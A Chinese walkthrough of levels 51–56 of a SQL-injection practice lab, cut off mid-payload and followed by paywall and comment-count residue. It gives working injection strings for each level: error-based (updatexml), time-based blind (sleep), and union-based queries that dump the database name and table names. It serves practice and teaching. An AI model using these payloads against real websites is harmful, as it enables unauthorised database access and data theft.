第五十一关
我们发现这里有报错信息,那么就可以根据报错信息
找到闭合符为单引号,然后报错注入秒掉
?sort=2' and updatexml(1,concat(0x7e,(select database()),0x7e),1)-- -
第五十二关
我们还是先判断闭合符,发现没有报错信息,通过几次尝试判断没有闭合符
我们接下来使用布尔盲注,发现没有回显区别
那么就使用延时注入
?sort=2 and if(substr((select database()),1,1)="s",sleep(5),1)-- -
第五十三关
我们进入,发现和第五十二关差不多,这里它还是没有报错回显
我们判断闭合符为单引号'
然后由于and 1=0没有区别
我们还是使用延时注入
?sort=2' and if(substr((select database()),1,1)="s",sleep(5),1)-- -
第五十四关
这里说我们有一个challenge库,库下面有个表,我们发现还是使用联合查询
它限制了联合查询的次数,次数到了就会重置表名
下面的那个输入框就是骗人的,没啥用,欠骂的可以去多尝试几次
我们还是联合注入能秒,有兴趣往下渗透的可以使用开头提到的语句替换进行爆表等操作
?id=111' union select 1,2,database()-- -
第五十五关
判断闭合符,发现怎样都不成功
我们可以尝试连接and 1=1
发现是数值型注入
我们可以发现闭合符为)然后注入即可
?id=111) union select 1,2,database()-- -
第五十六关
我们直接在这里使用burpsuite
?id=1 `空格*2` and 1=1-- -
对这个空格进行一个爆破,得到闭合符为')
然后使用联合查询秒掉即可
这里使用了一个报表语句
?id=1111') union select 1,2,group_concat(table_name) from informa

最低0.47元/天 解锁文章
3271

被折叠的 条评论
为什么被折叠?



